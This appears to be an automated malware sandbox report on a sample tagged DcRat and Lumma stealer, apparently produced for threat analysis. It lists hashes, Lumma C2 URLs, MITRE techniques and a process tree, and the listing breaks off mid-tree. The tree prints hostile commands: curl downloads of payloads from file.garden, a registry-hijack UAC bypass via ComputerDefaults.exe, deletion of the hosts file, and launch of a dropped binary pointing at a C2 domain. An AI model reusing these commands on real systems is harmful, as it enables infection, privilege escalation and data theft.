dcrat | c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966

Analysis

max time kernel
94s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-11-2024 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
Size

575KB
MD5

21110bdf3a234f15f6f7523aa0fa0e90
SHA1

50f8de3658915f7967042f071a95522866d149f9
SHA256

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966
SHA512

6c61cb2c3fae5ba1511ec2ef468d54240fd428834495fba919a91e90a7d00cbff0868e65b3d29f08327244b2c6e1b369bbb4b3acddde1b5a7156bf87be575c50
SSDEEP

12288:QgBHXRtrPBInYtSsnadym2jO+Aem8kAuW3f:DjJPB0sn4AV3

Score

10^/10

dcrat lumma defense_evasion discovery infostealer rat stealer

Malware Config

Extracted

Family

lumma

https://strappystyio.shop/api

https://coursedonnyre.shop/api

https://fossillargeiw.shop/api

https://tendencerangej.shop/api

https://appleboltelwk.shop/api

https://tearrybyiwo.shop/api

https://captainynfanw.shop/api

https://surveriysiop.shop/api

https://tiddymarktwo.shop/api

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	636	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3704	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1104	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4376	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3076	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1656	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1476	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4324	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1380	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2552	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2828	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	328	3284	schtasks.exe	112
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1632	3284	schtasks.exe	112

Downloads MZ/PE file

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exekdmapper.exewscript.exewscript.exeWScript.execomBrowserfontCommon.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	kdmapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	comBrowserfontCommon.exe

Executes dropped EXE 6 IoCs

Processes:

imxyvi.exephysmeme.exekdmapper.exePqwO27Ome3SRZg2Dd3LMX006.execomBrowserfontCommon.exetaskhostw.exe

pid	Process
2936	imxyvi.exe
5096	physmeme.exe
2044	kdmapper.exe
3852	PqwO27Ome3SRZg2Dd3LMX006.exe
2076	comBrowserfontCommon.exe
4808	taskhostw.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
34	raw.githubusercontent.com
35	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

Processes:

physmeme.exe

description	pid	Process	procid_target
PID 5096 set thread context of 3796	5096	physmeme.exe	101

Drops file in Program Files directory 4 IoCs

Processes:

comBrowserfontCommon.exe

description	ioc	Process
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe	comBrowserfontCommon.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\5940a34987c991	comBrowserfontCommon.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\RuntimeBroker.exe	comBrowserfontCommon.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\9e8d7a4ca61bd9	comBrowserfontCommon.exe

Drops file in Windows directory 6 IoCs

Processes:

comBrowserfontCommon.execurl.execurl.execurl.exe

description	ioc	Process
File created	C:\Windows\Speech\Common\services.exe	comBrowserfontCommon.exe
File created	C:\Windows\OCR\it-it\fontdrvhost.exe	comBrowserfontCommon.exe
File created	C:\Windows\System\Speech\explorer.exe	comBrowserfontCommon.exe
File created	C:\Windows\Speech\imxyvi.exe	curl.exe
File created	C:\Windows\Speech\physmeme.exe	curl.exe
File created	C:\Windows\Speech\kdmapper.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

RegAsm.execmd.exephysmeme.exekdmapper.exeWScript.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kdmapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXE

pid	Process
5096	PING.EXE

Modifies registry class 24 IoCs

Processes:

reg.exereg.exereg.exereg.execomBrowserfontCommon.exereg.exereg.exekdmapper.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\43372.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	comBrowserfontCommon.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	kdmapper.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\184752.vbs"	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
5096	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	Process
2828	schtasks.exe
636	schtasks.exe
2692	schtasks.exe
3076	schtasks.exe
4324	schtasks.exe
2592	schtasks.exe
328	schtasks.exe
3180	schtasks.exe
1104	schtasks.exe
1656	schtasks.exe
1476	schtasks.exe
4376	schtasks.exe
876	schtasks.exe
1380	schtasks.exe
2632	schtasks.exe
3704	schtasks.exe
2552	schtasks.exe
1632	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.execomBrowserfontCommon.exe

pid	Process
1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe
2076	comBrowserfontCommon.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

comBrowserfontCommon.exetaskhostw.exe

description	pid	Process
Token: SeDebugPrivilege	2076	comBrowserfontCommon.exe
Token: SeDebugPrivilege	4808	taskhostw.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.execmd.execmd.execmd.exekdmapper.exephysmeme.exeimxyvi.execmd.execmd.execmd.exeComputerDefaults.exewscript.execmd.execmd.exe

description	pid	Process	procid_target
PID 1164 wrote to memory of 5108	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	84
PID 1164 wrote to memory of 5108	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	84
PID 5108 wrote to memory of 2088	5108	cmd.exe	85
PID 5108 wrote to memory of 2088	5108	cmd.exe	85
PID 1164 wrote to memory of 2936	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	89
PID 1164 wrote to memory of 2936	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	89
PID 1164 wrote to memory of 4324	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	90
PID 1164 wrote to memory of 4324	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	90
PID 4324 wrote to memory of 3776	4324	cmd.exe	91
PID 4324 wrote to memory of 3776	4324	cmd.exe	91
PID 1164 wrote to memory of 5096	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	92
PID 1164 wrote to memory of 5096	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	92
PID 1164 wrote to memory of 5096	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	92
PID 1164 wrote to memory of 3184	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	93
PID 1164 wrote to memory of 3184	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	93
PID 3184 wrote to memory of 2592	3184	cmd.exe	94
PID 3184 wrote to memory of 2592	3184	cmd.exe	94
PID 1164 wrote to memory of 2828	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	96
PID 1164 wrote to memory of 2828	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	96
PID 1164 wrote to memory of 2044	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	97
PID 1164 wrote to memory of 2044	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	97
PID 1164 wrote to memory of 2044	1164	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	97
PID 2044 wrote to memory of 2260	2044	kdmapper.exe	99
PID 2044 wrote to memory of 2260	2044	kdmapper.exe	99
PID 2044 wrote to memory of 2260	2044	kdmapper.exe	99
PID 5096 wrote to memory of 2196	5096	physmeme.exe	100
PID 5096 wrote to memory of 2196	5096	physmeme.exe	100
PID 5096 wrote to memory of 2196	5096	physmeme.exe	100
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 5096 wrote to memory of 3796	5096	physmeme.exe	101
PID 2936 wrote to memory of 3456	2936	imxyvi.exe	104
PID 2936 wrote to memory of 3456	2936	imxyvi.exe	104
PID 3456 wrote to memory of 3760	3456	cmd.exe	106
PID 3456 wrote to memory of 3760	3456	cmd.exe	106
PID 2936 wrote to memory of 3108	2936	imxyvi.exe	107
PID 2936 wrote to memory of 3108	2936	imxyvi.exe	107
PID 3108 wrote to memory of 4180	3108	cmd.exe	109
PID 3108 wrote to memory of 4180	3108	cmd.exe	109
PID 3108 wrote to memory of 3080	3108	cmd.exe	110
PID 3108 wrote to memory of 3080	3108	cmd.exe	110
PID 2936 wrote to memory of 2576	2936	imxyvi.exe	113
PID 2936 wrote to memory of 2576	2936	imxyvi.exe	113
PID 2576 wrote to memory of 5104	2576	cmd.exe	115
PID 2576 wrote to memory of 5104	2576	cmd.exe	115
PID 5104 wrote to memory of 744	5104	ComputerDefaults.exe	116
PID 5104 wrote to memory of 744	5104	ComputerDefaults.exe	116
PID 744 wrote to memory of 2632	744	wscript.exe	117
PID 744 wrote to memory of 2632	744	wscript.exe	117
PID 2936 wrote to memory of 3704	2936	imxyvi.exe	119
PID 2936 wrote to memory of 3704	2936	imxyvi.exe	119
PID 2936 wrote to memory of 4148	2936	imxyvi.exe	121
PID 2936 wrote to memory of 4148	2936	imxyvi.exe	121
PID 4148 wrote to memory of 1104	4148	cmd.exe	123
PID 4148 wrote to memory of 1104	4148	cmd.exe	123
PID 2936 wrote to memory of 760	2936	imxyvi.exe	127
PID 2936 wrote to memory of 760	2936	imxyvi.exe	127
PID 760 wrote to memory of 1380	760	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
"C:\Users\Admin\AppData\Local\Temp\c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
    3⤵
    - Drops file in Windows directory
    PID:2088
- C:\Windows\Speech\imxyvi.exe
  "C:\Windows\Speech\imxyvi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3456
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:3760
- - C:\Windows\system32\cmd.exe
    /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\184752.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3108
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\184752.vbs" /f
      4⤵
      Modifies registry class
      PID:4180
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:3080
- - C:\Windows\system32\cmd.exe
    /c start /B ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\system32\ComputerDefaults.exe
      ComputerDefaults.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5104
    - - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\184752.vbs
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:744
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        6⤵
        
        PID:2632
- - C:\Windows\system32\cmd.exe
    /c del /f C:\Users\Admin\AppData\Local\Temp\184752.vbs
    3⤵
    PID:3704
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Modifies registry class
      PID:1104
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:1380
- - C:\Windows\system32\cmd.exe
    /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\43372.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    PID:3212
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\43372.vbs" /f
      4⤵
      Modifies registry class
      PID:112
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:392
- - C:\Windows\system32\cmd.exe
    /c start /B ComputerDefaults.exe
    3⤵
    PID:4576
  - - C:\Windows\system32\ComputerDefaults.exe
      ComputerDefaults.exe
      4⤵
      PID:3660
    - - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\43372.vbs
        5⤵
        Checks computer location settings
        
        PID:2844
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\PqwO27Ome3SRZg2Dd3LMX006.exe 7le34qpf4mf70vv3qmouvcxpjp61a0:PqwO27Ome3SRZg2Dd3LMX006:zetolacs-cloud.top
        6⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\PqwO27Ome3SRZg2Dd3LMX006.exe
        
        C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\PqwO27Ome3SRZg2Dd3LMX006.exe 7le34qpf4mf70vv3qmouvcxpjp61a0:PqwO27Ome3SRZg2Dd3LMX006:zetolacs-cloud.top
        7⤵
        Executes dropped EXE
        
        PID:3852
- - C:\Windows\system32\cmd.exe
    /c del /f C:\Users\Admin\AppData\Local\Temp\43372.vbs
    3⤵
    PID:4532
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:2196
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Modifies registry class
      PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4324
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:3776
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2196
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3184
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
    3⤵
    - Drops file in Windows directory
    PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2828
- C:\Windows\Speech\kdmapper.exe
  "C:\Windows\Speech\kdmapper.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ChainSurrogateServersessionCrt\AjINMi8J6kx3pWrbYYHviGjQ7go1FcYdMdMi4IhRz46EcvjyaTF.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:2260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ChainSurrogateServersessionCrt\eTau3XGYlc3.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:1576
    - - C:\ChainSurrogateServersessionCrt\comBrowserfontCommon.exe
        
        "C:\ChainSurrogateServersessionCrt/comBrowserfontCommon.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vrHapNwuMI.bat"
        6⤵
        
        PID:3612
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1616
        
        C:\Windows\system32\PING.EXE
        
